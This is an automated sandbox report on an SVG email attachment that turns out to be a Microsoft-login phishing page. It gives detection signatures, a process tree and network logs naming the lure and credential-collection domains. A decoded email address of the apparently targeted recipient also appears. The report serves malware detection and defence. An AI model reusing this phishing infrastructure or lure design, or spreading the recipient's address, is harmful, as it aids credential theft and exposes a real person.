Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ATT48234.svg

Overview

General Information

Sample name:ATT48234.svg
Analysis ID:1635916
MD5:2c7d48a01066ebf49b626c073fcdf54d
SHA1:322754f01c7c9f993d7c334547fea1d78286b747
SHA256:64df54eefba97410b2065e66c58b847b554222f69f71a825b8c5cc7fb147ab69
Infos:

Detection

HTMLPhisher
Score:64
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish10
Performs DNS queries to domains with low reputation
Phishing site or detected (based on various text indicators)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
IP address seen in connection with other malware
Invalid T&C link found
JA3 SSL client fingerprint seen in connection with other malware
None HTTPS page querying sensitive user data (password, username or email)
Suricata IDS alerts with low severity for network traffic

Classification

Process Tree

  • System is w10x64
  • chrome.exe (PID: 8572 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\ATT48234.svg" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 8920 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,12216711125976457745,3421467908659589367,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2252 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 8408 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,12216711125976457745,3421467908659589367,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5196 /prefetch:8 MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 5216 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --no-pre-read-main-dll --field-trial-handle=1976,i,12216711125976457745,3421467908659589367,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5128 /prefetch:8 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

HTML

SourceRuleDescriptionAuthorStrings
0.6.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    0.7.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      0.8.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security

        Sigma Signatures

        No Sigma rule has matched

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-03-12T06:45:05.286427+010028032742Potentially Bad Traffic192.168.2.549709172.67.74.152443TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        Phishing

        barindex
        AI detected phishing page
        Source: file:///C:/Users/user/Desktop/ATT48234.svgJoe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 0.6.pages.csv
        Yara detected HtmlPhish10
        Source: Yara matchFile source: 0.6.pages.csv, type: HTML
        Source: Yara matchFile source: 0.7.pages.csv, type: HTML
        Source: Yara matchFile source: 0.8.pages.csv, type: HTML
        Phishing site or detected (based on various text indicators)
        Source: Chrome DOM: 0.4OCR Text: Microsoft Browser ensuring safe internet use. Verifying... CLOUDFLARE Ten-rs To proceed, Microsoft has to ensure that your connection is safe and secure
        Source: file:///C:/Users/user/Desktop/ATT48234.svgHTTP Parser: Number of links: 0
        Source: file:///C:/Users/user/Desktop/ATT48234.svgHTTP Parser: <input type="password" .../> found but no <form action="...
        Source: file:///C:/Users/user/Desktop/ATT48234.svgHTTP Parser: Base64 decoded: norm.fitzgerald@nationalmi.com
        Source: file:///C:/Users/user/Desktop/ATT48234.svgHTTP Parser: Title: Sign in to your account does not match URL
        Source: file:///C:/Users/user/Desktop/ATT48234.svgHTTP Parser: Invalid link: Privacy statement
        Source: file:///C:/Users/user/Desktop/ATT48234.svgHTTP Parser: Invalid link: Privacy statement
        Source: file:///C:/Users/user/Desktop/ATT48234.svgHTTP Parser: Invalid link: Privacy statement
        Source: file:///C:/Users/user/Desktop/ATT48234.svgHTTP Parser: Has password / email / username input fields
        Source: file:///C:/Users/user/Desktop/ATT48234.svgHTTP Parser: <input type="password" .../> found
        Source: file:///C:/Users/user/Desktop/ATT48234.svgHTTP Parser: No favicon
        Source: file:///C:/Users/user/Desktop/ATT48234.svgHTTP Parser: No favicon
        Source: file:///C:/Users/user/Desktop/ATT48234.svgHTTP Parser: No favicon
        Source: file:///C:/Users/user/Desktop/ATT48234.svgHTTP Parser: No favicon
        Source: file:///C:/Users/user/Desktop/ATT48234.svgHTTP Parser: No favicon
        Source: file:///C:/Users/user/Desktop/ATT48234.svgHTTP Parser: No favicon
        Source: file:///C:/Users/user/Desktop/ATT48234.svgHTTP Parser: No favicon
        Source: file:///C:/Users/user/Desktop/ATT48234.svgHTTP Parser: No <meta name="author".. found
        Source: file:///C:/Users/user/Desktop/ATT48234.svgHTTP Parser: No <meta name="author".. found
        Source: file:///C:/Users/user/Desktop/ATT48234.svgHTTP Parser: No <meta name="author".. found
        Source: file:///C:/Users/user/Desktop/ATT48234.svgHTTP Parser: No <meta name="copyright".. found
        Source: file:///C:/Users/user/Desktop/ATT48234.svgHTTP Parser: No <meta name="copyright".. found
        Source: file:///C:/Users/user/Desktop/ATT48234.svgHTTP Parser: No <meta name="copyright".. found
        Source: unknownHTTPS traffic detected: 150.171.27.254:443 -> 192.168.2.5:49729 version: TLS 1.2

        Networking

        barindex
        Performs DNS queries to domains with low reputation
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: 6032451419.xyz
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: 6032451419.xyz
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: 6032451419.xyz
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: 6032451419.xyz
        Source: global trafficTCP traffic: 192.168.2.5:59656 -> 1.1.1.1:53
        Source: Joe Sandbox ViewIP Address: 104.18.10.207 104.18.10.207
        Source: Joe Sandbox ViewIP Address: 104.18.10.207 104.18.10.207
        Source: Joe Sandbox ViewIP Address: 151.101.129.229 151.101.129.229
        Source: Joe Sandbox ViewIP Address: 151.101.193.229 151.101.193.229
        Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49709 -> 172.67.74.152:443
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
        Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.254
        Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.254
        Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.254
        Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.254
        Source: unknownTCP traffic detected without corresponding DNS query: 2.21.65.154
        Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.35
        Source: unknownTCP traffic detected without corresponding DNS query: 2.16.164.41
        Source: unknownTCP traffic detected without corresponding DNS query: 2.16.164.41
        Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.35
        Source: unknownTCP traffic detected without corresponding DNS query: 2.16.164.41
        Source: unknownTCP traffic detected without corresponding DNS query: 2.16.164.41
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 184.30.131.245
        Source: unknownTCP traffic detected without corresponding DNS query: 184.30.131.245
        Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.72
        Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.72
        Source: unknownTCP traffic detected without corresponding DNS query: 184.30.131.245
        Source: unknownTCP traffic detected without corresponding DNS query: 184.30.131.245
        Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.72
        Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.72
        Source: unknownTCP traffic detected without corresponding DNS query: 2.16.164.41
        Source: unknownTCP traffic detected without corresponding DNS query: 2.16.164.41
        Source: unknownTCP traffic detected without corresponding DNS query: 2.16.164.41
        Source: unknownTCP traffic detected without corresponding DNS query: 2.16.164.41
        Source: unknownTCP traffic detected without corresponding DNS query: 184.30.131.245
        Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.72
        Source: unknownTCP traffic detected without corresponding DNS query: 184.30.131.245
        Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.72
        Source: unknownTCP traffic detected without corresponding DNS query: 184.30.131.245
        Source: unknownTCP traffic detected without corresponding DNS query: 184.30.131.245
        Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.72
        Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.72
        Source: unknownTCP traffic detected without corresponding DNS query: 2.16.164.41
        Source: unknownTCP traffic detected without corresponding DNS query: 2.16.164.41
        Source: unknownTCP traffic detected without corresponding DNS query: 2.16.164.41
        Source: unknownTCP traffic detected without corresponding DNS query: 2.16.164.41
        Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.254
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: AutoItHost: api.ipify.orgCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: AutoItHost: api.ipify.org
        Source: global trafficHTTP traffic detected: GET /api/json/ip/5SPfwvEV3gwc55pvxBQOnjhEt01fgi0C/100.4.70.108 HTTP/1.1User-Agent: AutoItHost: ipqualityscore.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /gh/pranaynamnaik/files@latest/micro-123787483.png HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://inv18993383.cloudfaxservice.de/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://inv18993383.cloudfaxservice.de/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /gh/pranaynamnaik/files@latest/micro-123787483.png HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://inv18993383.cloudfaxservice.de/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/j3ti1/0x4AAAAAAA_17RW0oiaBV-_V/auto/fbE/new/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://inv18993383.cloudfaxservice.de/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=91f0fc773d2dc950&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/j3ti1/0x4AAAAAAA_17RW0oiaBV-_V/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/j3ti1/0x4AAAAAAA_17RW0oiaBV-_V/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1655362686:1741756484:q3ExwLGQNkp_y8KzhtdyEVNWZSc09lr0GJahn82ftTU/91f0fc773d2dc950/o4Y_tZxHXOeYICtX5FS0XNXP5yLgUJtnRxyJmDC7UIo-1741758334-1.1.1.1-2T94pV33wd8wWpFTCfl1whaxqLP7nPGiZIxAibBHnRdf4ZOHNOMcy3VRIuDlY_9Y HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/91f0fc773d2dc950/1741758340321/f-N77EFOvqIiJpj HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/j3ti1/0x4AAAAAAA_17RW0oiaBV-_V/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/91f0fc773d2dc950/1741758340321/f-N77EFOvqIiJpj HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/91f0fc773d2dc950/1741758340321/46286f9ba986a1ed8f31d764eb9c21ac5cef8509fdbb1ba386a8e6efd09b08ba/hAuKx2TlQ_6wWb6 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/j3ti1/0x4AAAAAAA_17RW0oiaBV-_V/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1655362686:1741756484:q3ExwLGQNkp_y8KzhtdyEVNWZSc09lr0GJahn82ftTU/91f0fc773d2dc950/o4Y_tZxHXOeYICtX5FS0XNXP5yLgUJtnRxyJmDC7UIo-1741758334-1.1.1.1-2T94pV33wd8wWpFTCfl1whaxqLP7nPGiZIxAibBHnRdf4ZOHNOMcy3VRIuDlY_9Y HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1655362686:1741756484:q3ExwLGQNkp_y8KzhtdyEVNWZSc09lr0GJahn82ftTU/91f0fc773d2dc950/o4Y_tZxHXOeYICtX5FS0XNXP5yLgUJtnRxyJmDC7UIo-1741758334-1.1.1.1-2T94pV33wd8wWpFTCfl1whaxqLP7nPGiZIxAibBHnRdf4ZOHNOMcy3VRIuDlY_9Y HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveOrigin: https://inv18993383.cloudfaxservice.desec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://inv18993383.cloudfaxservice.de/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveOrigin: https://inv18993383.cloudfaxservice.desec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://inv18993383.cloudfaxservice.de/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /bootstrap.min.js HTTP/1.1Host: 6032451419-1317754460.cos.ap-singapore.myqcloud.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://inv18993383.cloudfaxservice.de/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /google.php HTTP/1.1Host: 6032451419.xyzConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /google.php HTTP/1.1Host: 6032451419.xyzConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /google.php HTTP/1.1Host: 6032451419.xyzConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /google.php HTTP/1.1Host: 6032451419.xyzConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficDNS traffic detected: DNS query: inv18993383.cloudfaxservice.de
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
        Source: global trafficDNS traffic detected: DNS query: code.jquery.com
        Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
        Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
        Source: global trafficDNS traffic detected: DNS query: 6032451419-1317754460.cos.ap-singapore.myqcloud.com
        Source: global trafficDNS traffic detected: DNS query: 6032451419.xyz
        Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
        Source: global trafficDNS traffic detected: DNS query: beacons.gcp.gvt2.com
        Source: global trafficDNS traffic detected: DNS query: beacons.gvt2.com
        Source: global trafficDNS traffic detected: DNS query: beacons2.gvt2.com
        Source: global trafficDNS traffic detected: DNS query: beacons3.gvt2.com
        Source: global trafficDNS traffic detected: DNS query: beacons4.gvt2.com
        Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/flow/ov1/1655362686:1741756484:q3ExwLGQNkp_y8KzhtdyEVNWZSc09lr0GJahn82ftTU/91f0fc773d2dc950/o4Y_tZxHXOeYICtX5FS0XNXP5yLgUJtnRxyJmDC7UIo-1741758334-1.1.1.1-2T94pV33wd8wWpFTCfl1whaxqLP7nPGiZIxAibBHnRdf4ZOHNOMcy3VRIuDlY_9Y HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3463sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: text/plain;charset=UTF-8cf-chl: o4Y_tZxHXOeYICtX5FS0XNXP5yLgUJtnRxyJmDC7UIo-1741758334-1.1.1.1-2T94pV33wd8wWpFTCfl1whaxqLP7nPGiZIxAibBHnRdf4ZOHNOMcy3VRIuDlY_9Ycf-chl-ra: 0sec-ch-ua-mobile: ?0Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/j3ti1/0x4AAAAAAA_17RW0oiaBV-_V/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: chromecache_132.1.drString found in binary or memory: http://opensource.org/licenses/MIT).
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
        Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
        Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59667
        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
